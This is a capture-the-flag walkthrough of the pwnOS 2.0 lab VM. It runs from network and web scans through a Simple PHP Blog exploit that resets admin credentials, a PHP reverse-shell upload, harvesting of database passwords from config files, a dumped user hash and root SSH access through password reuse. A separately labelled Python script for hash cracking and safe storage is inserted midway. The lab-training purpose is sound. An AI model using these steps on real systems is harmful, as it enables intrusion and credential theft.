PWNOS: 2.0 (PRE-RELEASE)
https://www.vulnhub.com/entry/pwnos-20-pre-release,34/
Host discovery
# yunki @ yunki in ~ [9:45:32]
$ nmap -sn 192.168.54.0/24
Nmap scan report for 192.168.54.7
Host is up (0.00029s latency).
Port scan
# yunki @ yunki in ~ [9:48:40]
$ sudo nmap --min-rate 10000 -p- 192.168.54.7
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-14 09:49 CST
Nmap scan report for 192.168.54.7
Host is up (0.00099s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 00:0C:29:65:84:D7 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 2.97 seconds
TCP scan
# yunki @ yunki in ~ [9:49:35]
$ sudo nmap -sT -sV -p22,80 192.168.54.7
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.8p1 Debian 1ubuntu3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.2.17 ((Ubuntu))
MAC Address: 00:0C:29:65:84:D7 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
UDP scan
# yunki @ yunki in ~ [9:50:22]
$ sudo nmap -sU -O -p22,80 192.168.54.7
PORT STATE SERVICE
22/udp closed ssh
80/udp closed http
MAC Address: 00:0C:29:65:84:D7 (VMware)
Too many fingerprints match this host to give specific OS details
Network Distance: 1 hop
Script scan
# yunki @ yunki in ~ [9:50:22]
$ sudo nmap -sU -O -p22,80 192.168.54.7
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-14 09:51 CST
Nmap scan report for 192.168.54.7
Host is up (0.00076s latency).
PORT STATE SERVICE
22/udp closed ssh
80/udp closed http
MAC Address: 00:0C:29:65:84:D7 (VMware)
Too many fingerprints match this host to give specific OS details
Network Distance: 1 hop
OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1.87 seconds
# yunki @ yunki in ~ [9:51:14]
$ sudo nmap --script=vuln -p22,80 192.168.54.7
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
| http-cookie-flags:
| /:
| PHPSESSID:
| httponly flag not set
| /login.php:
| PHPSESSID:
| httponly flag not set
| /login/:
| PHPSESSID:
| httponly flag not set
| /index/:
| PHPSESSID:
| httponly flag not set
| /register/:
| PHPSESSID:
|_ httponly flag not set
| http-enum:
| /blog/: Blog
| /login.php: Possible admin folder
| /login/: Login page
| /info.php: Possible information file
| /icons/: Potentially interesting folder w/ directory listing
| /includes/: Potentially interesting directory w/ listing on 'apache/2.2.17 (ubuntu)'
| /index/: Potentially interesting folder
| /info/: Potentially interesting folder
|_ /register/: Potentially interesting folder
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.54.7
| Found the following possible CSRF vulnerabilities:
|
| Path: http://192.168.54.7:80/login.php
| Form id:
| Form action: login.php
|
| Path: http://192.168.54.7:80/register.php
| Form id:
|_ Form action: register.php
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
MAC Address: 00:0C:29:65:84:D7 (VMware)
Web penetration
Try SQL injection on the login form.
It was blocked.
# yunki @ yunki in ~ [9:56:57]
$ dirb http://192.168.54.7
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Tue Mar 14 09:57:06 2023
URL_BASE: http://192.168.54.7/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.54.7/ ----
+ http://192.168.54.7/activate (CODE:302|SIZE:0)
==> DIRECTORY: http://192.168.54.7/blog/
+ http://192.168.54.7/cgi-bin/ (CODE:403|SIZE:288)
==> DIRECTORY: http://192.168.54.7/includes/
+ http://192.168.54.7/index (CODE:200|SIZE:854)
+ http://192.168.54.7/index.php (CODE:200|SIZE:854)
+ http://192.168.54.7/info (CODE:200|SIZE:50179)
+ http://192.168.54.7/info.php (CODE:200|SIZE:50048)
+ http://192.168.54.7/login (CODE:200|SIZE:1174)
+ http://192.168.54.7/register (CODE:200|SIZE:1562)
+ http://192.168.54.7/server-status (CODE:403|SIZE:293)
---- Entering directory: http://192.168.54.7/blog/ ----
+ http://192.168.54.7/blog/add (CODE:302|SIZE:0)
+ http://192.168.54.7/blog/atom (CODE:200|SIZE:1062)
+ http://192.168.54.7/blog/categories (CODE:302|SIZE:0)
+ http://192.168.54.7/blog/comments (CODE:302|SIZE:0)
==> DIRECTORY: http://192.168.54.7/blog/config/
+ http://192.168.54.7/blog/contact (CODE:200|SIZE:5922)
==> DIRECTORY: http://192.168.54.7/blog/content/
+ http://192.168.54.7/blog/delete (CODE:302|SIZE:0)
==> DIRECTORY: http://192.168.54.7/blog/docs/
==> DIRECTORY: http://192.168.54.7/blog/flash/
==> DIRECTORY: http://192.168.54.7/blog/images/
+ http://192.168.54.7/blog/index (CODE:200|SIZE:8094)
+ http://192.168.54.7/blog/index.php (CODE:200|SIZE:8094)
+ http://192.168.54.7/blog/info (CODE:302|SIZE:0)
+ http://192.168.54.7/blog/info.php (CODE:302|SIZE:0)
==> DIRECTORY: http://192.168.54.7/blog/interface/
==> DIRECTORY: http://192.168.54.7/blog/languages/
+ http://192.168.54.7/blog/login (CODE:200|SIZE:5671)
+ http://192.168.54.7/blog/logout (CODE:302|SIZE:0)
+ http://192.168.54.7/blog/options (CODE:302|SIZE:0)
+ http://192.168.54.7/blog/rdf (CODE:200|SIZE:1411)
+ http://192.168.54.7/blog/rss (CODE:200|SIZE:1237)
==> DIRECTORY: http://192.168.54.7/blog/scripts/
+ http://192.168.54.7/blog/search (CODE:200|SIZE:4955)
+ http://192.168.54.7/blog/setup (CODE:302|SIZE:0)
+ http://192.168.54.7/blog/static (CODE:302|SIZE:0)
+ http://192.168.54.7/blog/stats (CODE:200|SIZE:5313)
==> DIRECTORY: http://192.168.54.7/blog/themes/
+ http://192.168.54.7/blog/trackback (CODE:302|SIZE:0)
+ http://192.168.54.7/blog/upgrade (CODE:302|SIZE:0)
The scan turned up a blog directory, so let's look at http://192.168.54.7/blog
When you see a blog-style interface, the usual move is to identify the CMS behind it, so I viewed the page source and found
Search for it with searchsploit
# yunki @ yunki in ~ [10:04:02]
$ searchsploit simple php blog 0.4.0
--------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
--------------------------------------------------------------------------------------------------------------------- ---------------------------------
Simple PHP Blog 0.4.0 - Multiple Remote s | php/webapps/1191.pl
Simple PHP Blog 0.4.0 - Remote Command Execution (Metasploit) | php/webapps/16883.rb
--------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
# yunki @ yunki in ~/vulnhub [10:05:46]
$ searchsploit -m 1191
Exploit: Simple PHP Blog 0.4.0 - Multiple Remote s
URL: https://www.exploit-db.com/exploits/1191
Path: /usr/share/exploitdb/exploits/php/webapps/1191.pl
File Type: Perl script text executable
After reading through 1191.pl, let's use it. Create a new user.
┌──(root💀yunki)-[/home/yunki/vulnhub/pwnos2]
└─# perl 1191.pl -h http://192.168.54.7/blog/ -e 3 -U yunki -P yunki
________________________________________________________________________________
SimplePHPBlog v0.4.0 Exploits
by
Kenneth F. Belva, CISSP
http://www.ftusecurity.com
________________________________________________________________________________
Running Set New Username and Password Exploit....
Deleted File: ./config/password.txt
./config/password.txt created!
Username is set to: yunki
Password is set to: yunki
*** Exploit Completed....
Have a nice day! :)
Go log in. Login succeeded. Found a place where files can be uploaded.
Getting an initial shell
Test whether a PHP file can be uploaded; it can. So upload a PHP reverse shell.
cp /usr/share/laudanum/php/php-reverse-shell.php .
# edit the IP and port, and start a listener at the same time.
After uploading, the file has to be requested to trigger it. From the earlier directory scan we can see uploads land under /images/, so request it directly: http://192.168.54.7/blog/images/shell.php
Privilege escalation
# dpkg -l # check whether python is installed, to upgrade to an interactive shell
$ python -c "import pty;pty.spawn('/bin/bash')"
# Since this CMS is a blog, there must be a database config file; go to the web directory and look for the mysql file.
www-data@web:/$ cd /var/www
cd /var/www
www-data@web:/var/www$ ls
ls
activate.php includes info.php mysqli_connect.php
blog index.php login.php register.php
www-data@web:/var/www$ cat mysqli_connect.php
cat mysqli_connect.php
<?php # Script 8.2 - mysqli_connect.php
// This file contains the database access information.
// This file also establishes a connection to MySQL
// and selects the database.
// Set the database access information as constants:
DEFINE ('DB_USER', 'root');
DEFINE ('DB_PASSWORD', 'goodday');
DEFINE ('DB_HOST', 'localhost');
DEFINE ('DB_NAME', 'ch16');
// Make the connection:
$dbc = @mysqli_connect (DB_HOST, DB_USER, DB_PASSWORD, DB_NAME) OR die ('Could not connect to MySQL: ' . mysqli_connect_error() );
?>
# Try to log in; surprisingly, it's wrong
www-data@web:/var/www$ mysql -uroot -pgooday
mysql -uroot -pgooday
ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: YES)
Strangely, the system is running fine even though this MySQL password is wrong, which suggests there is another mysql config file, so keep searching.
www-data@web:/var/www$ find / -name "mysqli_connect.php" 2>/dev/null
find / -name "mysqli_connect.php" 2>/dev/null
/var/mysqli_connect.php
/var/www/mysqli_connect.php
www-data@web:/var/www$ cat /var/mysqli_connect.php
cat /var/mysqli_connect.php
<?php # Script 8.2 - mysqli_connect.php
// This file contains the database access information.
// This file also establishes a connection to MySQL
// and selects the database.
// Set the database access information as constants:
DEFINE ('DB_USER', 'root');
DEFINE ('DB_PASSWORD', 'root@ISIntS');
DEFINE ('DB_HOST', 'localhost');
DEFINE ('DB_NAME', 'ch16');
// Make the connection:
$dbc = @mysqli_connect (DB_HOST, DB_USER, DB_PASSWORD, DB_NAME) OR die ('Could not connect to MySQL: ' . mysqli_connect_error() );
?>
www-data@web:/var/www$ mysql -uroot -proot@ISIntS
mysql -uroot -proot@ISIntS
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 48
Server version: 5.1.54-1ubuntu4 (Ubuntu)
Copyright (c) 2000, 2010, Oracle and/or its affiliates. All rights reserved.
This software comes with ABSOLUTELY NO WARRANTY. This is free software,
and you are welcome to modify and redistribute it under the GPL v2 license
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql>
Look at the database contents
mysql> show databases;
show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| ch16 |
| mysql |
+--------------------+
3 rows in set (0.00 sec)
mysql> use ch16;
use ch16;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> show tables;
show tables;
+----------------+
| Tables_in_ch16 |
+----------------+
| users |
+----------------+
1 row in set (0.00 sec)
mysql> select * from users;
select * from users;
+---------+------------+-----------+------------------+------------------------------------------+------------+--------+---------------------+
| user_id | first_name | last_name | email | pass | user_level | active | registration_date |
+---------+------------+-----------+------------------+------------------------------------------+------------+--------+---------------------+
| 1 | Dan | Privett | admin@isints.com | c2c4b4e51d9e23c02c15702c136c3e950ba9a4af | 0 | NULL | 2011-05-07 17:27:01 |
+---------+------------+-----------+------------------+------------------------------------------+------------+--------+---------------------+
1 row in set (0.00 sec)
Now crack that password hash.
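The pass column above holds a bare 40-hex-character value with no salt and no algorithm marker, which is the shape of an unsalted SHA-1 digest, so a leaked copy falls to a plain wordlist at one hash call per guess. The following Python script is an added example, not code from the writeup: it identifies that shape, runs a constructed wordlist against a digest, and shows the salted, iterated PBKDF2 storage the application should have used instead. The PBKDF2 round count is my assumption, not something the page states.

```python
"""Added example (not part of the original writeup): why the hash pulled from
the ch16.users table is trivially checkable, and how the application should
have stored it instead. Standard library only."""
import hashlib
import hmac
import os
import re
from typing import Iterable, Optional

# 40 lowercase hex characters, no salt or "$algo$" prefix: the shape of a raw SHA-1 digest.
UNSALTED_SHA1 = re.compile(r"^[0-9a-f]{40}$")


def looks_like_unsalted_sha1(stored: str) -> bool:
    """True if the stored value has the shape of a bare SHA-1 hex digest."""
    return bool(UNSALTED_SHA1.match(stored.strip().lower()))


def sha1_hex(password: str) -> str:
    """Bare SHA-1 of the password, exactly as the legacy app stores it."""
    return hashlib.sha1(password.encode()).hexdigest()


def wordlist_check(stored: str, candidates: Iterable[str]) -> Optional[str]:
    """Return the first candidate whose bare SHA-1 equals the stored digest.

    With no salt and a fast hash, each candidate costs a single SHA-1 call,
    which is why an unsalted column like this one is cracked in seconds.
    """
    target = stored.strip().lower()
    for word in candidates:
        if hmac.compare_digest(sha1_hex(word), target):
            return word
    return None


# --- What the application should have done instead -------------------------
PBKDF2_ROUNDS = 600_000  # assumption: a present-day cost for PBKDF2-HMAC-SHA256


def hash_password(password: str, salt: Optional[bytes] = None) -> str:
    """Salted, iterated hash in a self-describing format: algo$rounds$salt$digest."""
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)
    return f"pbkdf2_sha256${PBKDF2_ROUNDS}${salt.hex()}${digest.hex()}"


def verify_password(password: str, stored: str) -> bool:
    """Recompute with the stored salt and rounds; compare in constant time."""
    try:
        algo, rounds, salt_hex, digest_hex = stored.split("$")
    except ValueError:
        return False
    if algo != "pbkdf2_sha256":
        return False
    digest = hashlib.pbkdf2_hmac(
        "sha256", password.encode(), bytes.fromhex(salt_hex), int(rounds)
    )
    return hmac.compare_digest(digest.hex(), digest_hex)


if __name__ == "__main__":
    # Hash exactly as it appears in the users table above.
    leaked = "c2c4b4e51d9e23c02c15702c136c3e950ba9a4af"
    # Constructed mini wordlist; the last entry is the password the writeup
    # later tries over SSH.
    wordlist = ["password", "admin", "goodday", "killerbeesareflying"]
    print("shape is unsalted SHA-1:", looks_like_unsalted_sha1(leaked))
    print("wordlist hit:", wordlist_check(leaked, wordlist))

    stored = hash_password("killerbeesareflying")
    print("properly stored:", stored)
    print("verify correct:", verify_password("killerbeesareflying", stored))
    print("verify wrong:", verify_password("goodday", stored))
```

The format string stores the algorithm, round count and salt beside the digest, so rounds can be raised later without breaking existing records, and the salt makes a precomputed table useless against the whole column at once.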
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
mysql:x:0:0:MySQL Server,,,:/root:/bin/bash
sshd:x:103:65534::/var/run/sshd:/usr/sbin/nologin
landscape:x:104:110::/var/lib/landscape:/bin/false
dan:x:1000:1000:Dan Privett,,,:/home/dan:/bin/bash
We have the password; the only regular user here is dan, so try logging in over SSH.
ssh dan@192.168.54.7 # killerbeesareflying wrong
ssh admin@192.168.54.7 # killerbeesareflying wrong
ssh Privett@192.168.54.7 # killerbeesareflying wrong
ssh isints@192.168.54.7 # killerbeesareflying wrong
None of them work, so try the two MySQL passwords from earlier; maybe the password was reused?
ssh root@192.168.54.7 # goodday wrong
ssh root@192.168.54.7 # root@ISIntS success!